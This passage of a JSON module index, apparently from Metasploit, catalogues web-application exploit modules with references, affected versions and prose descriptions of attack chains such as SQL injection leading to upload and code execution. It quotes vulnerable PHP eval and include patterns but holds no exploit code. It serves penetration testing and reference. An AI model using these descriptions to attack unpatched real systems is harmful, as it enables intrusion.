8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/open_flash_chart_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/openemr_sqli_privesc_upload": {
"name": "OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution",
"full_name": "exploit/unix/webapp/openemr_sqli_privesc_upload",
"rank": 600,
"disclosure_date": "2013-09-16",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in OpenEMR version 4.1.1 Patch 14 and lower.\n When logging in as any non-admin user, it's possible to retrieve the admin SHA1 password\n hash from the database through SQL injection. The SQL injection vulnerability exists\n in the \"new_comprehensive_save.php\" page. This hash can be used to log in as the admin\n user. After logging in, the \"manage_site_files.php\" page will be used to upload arbitrary\n code.",
"references": [
"OSVDB-97482",
"EDB-28329"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OpenEMR"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/openemr_sqli_privesc_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/openemr_upload_exec": {
"name": "OpenEMR PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/openemr_upload_exec",
"rank": 600,
"disclosure_date": "2013-02-13",
"type": "exploit",
"author": [
"Gjoko Krstic <gjoko@zeroscience.mk>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the\n ofc_upload_image.php file from the openflashchart library, a malicious user can\n upload a file to the tmp-upload-images directory without any authentication, which\n results in arbitrary code execution. The module has been tested successfully on\n OpenEMR 4.1.1 over Ubuntu 10.04.",
"references": [
"CVE-2009-4140",
"OSVDB-90222",
"BID-37314",
"EBD-24492",
"URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php",
"URL-http://www.open-emr.org/wiki/index.php/OpenEMR_Patches"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OpenEMR 4.1.1"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/unix/webapp/openemr_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/openemr_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/opensis_modname_exec": {
"name": "OpenSIS 'modname' PHP Code Execution",
"full_name": "exploit/unix/webapp/opensis_modname_exec",
"rank": 600,
"disclosure_date": "2012-12-04",
"type": "exploit",
"author": [
"EgiX",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a PHP code execution vulnerability in OpenSIS\n versions 4.5 to 5.2 which allows any authenticated user to execute\n arbitrary PHP code under the context of the web-server user.\n The 'ajax.php' file calls 'eval()' with user controlled data from\n the 'modname' parameter.",
"references": [
"CVE-2013-1349",
"OSVDB-100676",
"URL-http://karmainsecurity.com/KIS-2013-10",
"URL-http://sourceforge.net/p/opensis-ce/bugs/59/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OpenSIS version 4.5 to 5.2"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/opensis_modname_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/opensis_modname_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/openview_connectednodes_exec": {
"name": "HP Openview connectedNodes.ovpl Remote Command Execution",
"full_name": "exploit/unix/webapp/openview_connectednodes_exec",
"rank": 600,
"disclosure_date": "2005-08-25",
"type": "exploit",
"author": [
"Valerio Tesei <valk@mojodo.it>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n HP OpenView connectedNodes.ovpl CGI application. The results of the command\n will be displayed to the screen.",
"references": [
"CVE-2005-2773",
"OSVDB-19057",
"BID-14662"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/openview_connectednodes_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/openview_connectednodes_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/openx_banner_edit": {
"name": "OpenX banner-edit.php File Upload PHP Code Execution",
"full_name": "exploit/unix/webapp/openx_banner_edit",
"rank": 600,
"disclosure_date": "2009-11-24",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the OpenX advertising software.\n In versions prior to version 2.8.2, authenticated users can upload files\n with arbitrary extensions to be used as banner creative content. By uploading\n a file with a PHP extension, an attacker can execute arbitrary PHP code.\n\n NOTE: The file must also return either \"png\", \"gif\", or \"jpeg\" as its image\n type as returned from the PHP getimagesize() function.",
"references": [
"CVE-2009-4098",
"OSVDB-60499",
"BID-37110",
"URL-http://archives.neohapsis.com/archives/bugtraq/2009-11/0166.html",
"URL-http://www.openx.org/docs/2.8/release-notes/openx-2.8.2",
"URL-http://php.net/manual/en/function.getimagesize.php",
"URL-http://gynvael.coldwind.pl/?id=223",
"URL-http://gynvael.coldwind.pl/?id=224",
"URL-http://gynvael.coldwind.pl/?id=235",
"URL-http://programming.arantius.com/the+smallest+possible+gif",
"URL-http://stackoverflow.com/questions/2253404/what-is-the-smallest-valid-jpeg-file-size-in-bytes"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/openx_banner_edit.rb",
"is_install_path": true,
"ref_name": "unix/webapp/openx_banner_edit",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/oracle_vm_agent_utl": {
"name": "Oracle VM Server Virtual Server Agent Command Injection",
"full_name": "exploit/unix/webapp/oracle_vm_agent_utl",
"rank": 600,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a command injection flaw within Oracle\\'s VM Server\n Virtual Server Agent (ovs-agent) service.\n\n By including shell meta characters within the second parameter to the 'utl_test_url'\n XML-RPC methodCall, an attacker can execute arbitrary commands. The service\n typically runs with root privileges.\n\n NOTE: Valid credentials are required to trigger this vulnerable. The username\n appears to be hardcoded as 'oracle', but the password is set by the administrator\n at installation time.",
"references": [
"CVE-2010-3585",
"OSVDB-68797",
"BID-44047"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 8899,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb",
"is_install_path": true,
"ref_name": "unix/webapp/oracle_vm_agent_utl",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/oscommerce_filemanager": {
"name": "osCommerce 2.2 Arbitrary PHP Code Execution",
"full_name": "exploit/unix/webapp/oscommerce_filemanager",
"rank": 600,
"disclosure_date": "2009-08-31",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "osCommerce is a popular open source E-Commerce application.\n The admin console contains a file management utility that\n allows administrators to upload, download, and edit files.\n This could be abused to allow unauthenticated attackers to\n execute arbitrary code with the permissions of the\n webserver.",
"references": [
"OSVDB-60018",
"EDB-9556"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/oscommerce_filemanager.rb",
"is_install_path": true,
"ref_name": "unix/webapp/oscommerce_filemanager",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/pajax_remote_exec": {
"name": "PAJAX Remote Command Execution",
"full_name": "exploit/unix/webapp/pajax_remote_exec",
"rank": 600,
"disclosure_date": "2006-03-30",
"type": "exploit",
"author": [
"Matteo Cantoni <goony@nothink.org>",
"hdm <x@hdm.io>"
],
"description": "RedTeam has identified two security flaws in PAJAX (<= 0.5.1).\n It is possible to execute arbitrary PHP code from unchecked user input.\n Additionally, it is possible to include arbitrary files on the server\n ending in \".class.php\".",
"references": [
"CVE-2006-1551",
"OSVDB-24618",
"BID-17519",
"URL-http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/pajax_remote_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/pajax_remote_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/php_charts_exec": {
"name": "PHP-Charts v1.0 PHP Code Execution Vulnerability",
"full_name": "exploit/unix/webapp/php_charts_exec",
"rank": 600,
"disclosure_date": "2013-01-16",
"type": "exploit",
"author": [
"AkaStep",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a PHP code execution vulnerability in php-Charts\n version 1.0 which could be abused to allow users to execute arbitrary\n PHP code under the context of the webserver user. The 'url.php' script\n calls eval() with user controlled data from any HTTP GET parameter name.",
"references": [
"OSVDB-89334",
"BID-57448",
"EDB-24201"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/php_charts_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/php_charts_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/php_eval": {
"name": "Generic PHP Code Evaluation",
"full_name": "exploit/unix/webapp/php_eval",
"rank": 0,
"disclosure_date": "2008-10-13",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Exploits things like <?php eval($_REQUEST['evalme']); ?>\n It is likely that HTTP evasion options will break this exploit.",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-14 09:54:22 +0000",
"path": "/modules/exploits/unix/webapp/php_eval.rb",
"is_install_path": true,
"ref_name": "unix/webapp/php_eval",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/php_include": {
"name": "PHP Remote File Include Generic Code Execution",
"full_name": "exploit/unix/webapp/php_include",
"rank": 300,
"disclosure_date": "2006-12-17",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"egypt <egypt@metasploit.com>",
"ethicalhack3r"
],
"description": "This module can be used to exploit any generic PHP file include vulnerability,\n where the application includes code like the following:\n\n <?php include($_GET['path']); ?>",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/php_include.rb",
"is_install_path": true,
"ref_name": "unix/webapp/php_include",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/php_vbulletin_template": {
"name": "vBulletin misc.php Template Name Arbitrary Code Execution",
"full_name": "exploit/unix/webapp/php_vbulletin_template",
"rank": 600,
"disclosure_date": "2005-02-25",
"type": "exploit",
"author": [
"str0ke <str0ke@milw0rm.com>",
"cazz <bmc@shmoo.com>"
],
"description": "This module exploits an arbitrary PHP code execution flaw in\n the vBulletin web forum software. This vulnerability is only\n present when the \"Add Template Name in HTML Comments\" option\n is enabled. All versions of vBulletin prior to 3.0.7 are\n affected.",
"references": [
"CVE-2005-0511",
"BID-12622",
"OSVDB-14047"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/php_vbulletin_template.rb",
"is_install_path": true,
"ref_name": "unix/webapp/php_vbulletin_template",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/php_xmlrpc_eval": {
"name": "PHP XML-RPC Arbitrary Code Execution",
"full_name": "exploit/unix/webapp/php_xmlrpc_eval",
"rank": 600,
"disclosure_date": "2005-06-29",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"cazz <bmc@shmoo.com>"
],
"description": "This module exploits an arbitrary code execution flaw\n discovered in many implementations of the PHP XML-RPC module.\n This flaw is exploitable through a number of PHP web\n applications, including but not limited to Drupal, Wordpress,\n Postnuke, and TikiWiki.",
"references": [
"CVE-2005-1921",
"OSVDB-17793",
"BID-14088"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/php_xmlrpc_eval.rb",
"is_install_path": true,
"ref_name": "unix/webapp/php_xmlrpc_eval",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/phpbb_highlight": {
"name": "phpBB viewtopic.php Arbitrary Code Execution",
"full_name": "exploit/unix/webapp/phpbb_highlight",
"rank": 600,
"disclosure_date": "2004-11-12",
"type": "exploit",
"author": [
"valsmith <valsmith@metasploit.com>",
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits two arbitrary PHP code execution flaws in the\n phpBB forum system. The problem is that the 'highlight' parameter\n in the 'viewtopic.php' script is not verified properly and will\n allow an attacker to inject arbitrary code via preg_replace().\n\n This vulnerability was introduced in revision 3076, and finally\n fixed in revision 5166. According to the \"tags\" within their tree,\n this corresponds to versions 2.0.4 through 2.0.15 (inclusive).",
"references": [
"CVE-2005-2086",
"CVE-2004-1315",
"OSVDB-11719",
"OSVDB-17613",
"BID-14086",
"BID-10701"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"phpbb <=2.0.10",
"phpbb <=2.0.15"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/phpbb_highlight.rb",
"is_install_path": true,
"ref_name": "unix/webapp/phpbb_highlight",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/phpcollab_upload_exec": {
"name": "phpCollab 2.5.1 Unauthenticated File Upload",
"full_name": "exploit/unix/webapp/phpcollab_upload_exec",
"rank": 600,
"disclosure_date": "2017-09-29",
"type": "exploit",
"author": [
"Nicolas SERRA <n.serra@sysdream.com>",
"Nick Marcoccio \"1oopho1e\" <iremembermodems@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in phpCollab 2.5.1\n which could be abused to allow unauthenticated users to execute arbitrary code\n under the context of the web server user.\n\n The exploit has been tested on Ubuntu 16.04.3 64-bit",
"references": [
"CVE-2017-6090",
"EDB-42934",
"URL-http://www.phpcollab.com/",
"URL-https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-01-10 17:38:52 +0000",
"path": "/modules/exploits/unix/webapp/phpcollab_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/phpcollab_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/phpmyadmin_config": {
"name": "PhpMyAdmin Config File Code Injection",
"full_name": "exploit/unix/webapp/phpmyadmin_config",
"rank": 600,
"disclosure_date": "2009-03-24",
"type": "exploit",
"author": [
"Greg Ose",
"pagvac",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a vulnerability in phpMyAdmin's setup\n feature which allows an attacker to inject arbitrary PHP\n code into a configuration file. The original advisory says\n the vulnerability is present in phpMyAdmin versions 2.11.x\n < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on\n 3.0.1.1.\n\n The file where our payload is written\n (phpMyAdmin/config/config.inc.php) is not directly used by\n the system, so it may be a good idea to either delete it or\n copy the running config (phpMyAdmin/config.inc.php) over it\n after successful exploitation.",
"references": [
"CVE-2009-1151",
"OSVDB-53076",
"EDB-8921",
"URL-http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php",
"URL-http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (phpMyAdmin 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1)"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/phpmyadmin_config.rb",
"is_install_path": true,
"ref_name": "unix/webapp/phpmyadmin_config",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/piwik_superuser_plugin_upload": {
"name": "Piwik Superuser Plugin Upload",
"full_name": "exploit/unix/webapp/piwik_superuser_plugin_upload",
"rank": 600,
"disclosure_date": "2017-02-05",
"type": "exploit",
"author": [
"FireFart"
],
"description": "This module will generate a plugin, pack the payload into it\n and upload it to a server running Piwik. Superuser Credentials are\n required to run this module. This module does not work against Piwik 1\n as there is no option to upload custom plugins. Piwik disabled\n custom plugin uploads in version 3.0.3. From version 3.0.3 onwards you\n have to enable custom plugin uploads via the config file.\n Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.",
"references": [
"URL-https://firefart.at/post/turning_piwik_superuser_creds_into_rce/",
"URL-https://piwik.org/faq/plugins/faq_21/",
"URL-https://piwik.org/changelog/piwik-3-0-3/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Piwik"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/piwik_superuser_plugin_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/piwik_superuser_plugin_upload",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/projectpier_upload_exec": {
"name": "Project Pier Arbitrary File Upload Vulnerability",
"full_name": "exploit/unix/webapp/projectpier_upload_exec",
"rank": 600,
"disclosure_date": "2012-10-08",
"type": "exploit",
"author": [
"BlackHawk",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Project Pier. The application's\n uploading tool does not require any authentication, which allows a malicious user\n to upload an arbitrary file onto the web server, and then cause remote code\n execution by simply requesting it. This module is known to work against Apache\n servers due to the way it handles an extension name, but the vulnerability may\n not be exploitable on others.",
"references": [
"OSVDB-85881",
"EDB-21929",
"PACKETSTORM-117070"
],
"platform": "Linux,PHP",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/projectpier_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/projectpier_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/projectsend_upload_exec": {
"name": "ProjectSend Arbitrary File Upload",
"full_name": "exploit/unix/webapp/projectsend_upload_exec",
"rank": 600,
"disclosure_date": "2014-12-02",
"type": "exploit",
"author": [
"Fady Mohammed Osman",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in ProjectSend\n revisions 100 to 561. The 'process-upload.php' file allows\n unauthenticated users to upload PHP files resulting in remote\n code execution as the web server user.",
"references": [
"EDB-35424"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ProjectSend (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/projectsend_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/projectsend_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/qtss_parse_xml_exec": {
"name": "QuickTime Streaming Server parse_xml.cgi Remote Execution",
"full_name": "exploit/unix/webapp/qtss_parse_xml_exec",
"rank": 600,
"disclosure_date": "2003-02-24",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "The QuickTime Streaming Server contains a CGI script that is vulnerable\n to metacharacter injection, allow arbitrary commands to be executed as root.",
"references": [
"OSVDB-10562",
"BID-6954",
"CVE-2003-0050"
],
"platform": "Unix",
"arch": "cmd",
"rport": 1220,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/qtss_parse_xml_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/redmine_scm_exec": {
"name": "Redmine SCM Repository Arbitrary Command Execution",
"full_name": "exploit/unix/webapp/redmine_scm_exec",
"rank": 600,
"disclosure_date": "2010-12-19",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Redmine repository controller. The flaw is triggered when a rev parameter\n is passed to the command line of the SCM tool without adequate filtering.",
"references": [
"CVE-2011-4929",
"OSVDB-70090",
"URL-http://www.redmine.org/news/49"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/redmine_scm_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/redmine_scm_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/seportal_sqli_exec": {
"name": "SePortal SQLi Remote Code Execution",
"full_name": "exploit/unix/webapp/seportal_sqli_exec",
"rank": 600,
"disclosure_date": "2014-03-20",
"type": "exploit",
"author": [
"jsass",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in SePortal version 2.5.\n When logging in as any non-admin user, it's possible to retrieve the admin session\n from the database through SQL injection. The SQL injection vulnerability exists\n in the \"staticpages.php\" page. This hash can be used to take over the admin\n user session. After logging in, the \"/admin/downloads.php\" page will be used\n to upload arbitrary code.",
"references": [
"CVE-2008-5191",
"OSVDB-46567",
"EDB-32359"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SePortal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/seportal_sqli_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/seportal_sqli_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/simple_e_document_upload_exec": {
"name": "Simple E-Document Arbitrary File Upload",
"full_name": "exploit/unix/webapp/simple_e_document_upload_exec",
"rank": 600,
"disclosure_date": "2014-01-23",
"type": "exploit",
"author": [
"vinicius777 <vinicius777@gmail.com>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability found in Simple\n E-Document versions 3.0 to 3.1. Attackers can bypass authentication and\n abuse the upload feature in order to upload malicious PHP files which\n results in arbitrary remote code execution as the web server user. File\n uploads are disabled by default.",
"references": [
"EDB-31142"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/simple_e_document_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/sixapart_movabletype_storable_exec": {
"name": "SixApart MovableType Storable Perl Code Execution",
"full_name": "exploit/unix/webapp/sixapart_movabletype_storable_exec",
"rank": 400,
"disclosure_date": "2015-02-11",
"type": "exploit",
"author": [
"John Lightsey"
],
"description": "This module exploits a serialization flaw in MovableType before 5.2.12 to execute\n arbitrary code. The default nondestructive mode depends on the target server having\n the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.\n The destructive mode of operation uses only required MovableType dependencies,\n but it will noticeably corrupt the MovableType installation.",
"references": [
"CVE-2015-1592",
"URL-https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/sixapart_movabletype_storable_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/skybluecanvas_exec": {
"name": "SkyBlueCanvas CMS Remote Code Execution",
"full_name": "exploit/unix/webapp/skybluecanvas_exec",
"rank": 600,
"disclosure_date": "2014-01-28",
"type": "exploit",
"author": [
"Scott Parish",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits an arbitrary command execution vulnerability\n in SkyBlueCanvas CMS version 1.1 r248-03 and below.",
"references": [
"CVE-2014-1683",
"OSVDB-102586",
"BID-65129",
"EDB-31183",
"PACKETSTORM-124948"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SkyBlueCanvas 1.1 r248"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/skybluecanvas_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/skybluecanvas_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/sphpblog_file_upload": {
"name": "Simple PHP Blog Remote Command Execution",
"full_name": "exploit/unix/webapp/sphpblog_file_upload",
"rank": 600,
"disclosure_date": "2005-08-25",
"type": "exploit",
"author": [
"Matteo Cantoni <goony@nothink.org>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module combines three separate issues within The Simple PHP Blog (<= 0.4.0)\n application to upload arbitrary data and thus execute a shell. The first\n vulnerability exposes the hash file (password.txt) to unauthenticated users.\n The second vulnerability lies within the image upload system provided to\n logged-in users; there is no image validation function in the blogger to\n prevent an authenticated user from uploading any file type. The third\n vulnerability occurs within the blog comment functionality, allowing\n arbitrary files to be deleted.",
"references": [
"CVE-2005-2733",
"OSVDB-19012",
"BID-14667",
"EDB-1191"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
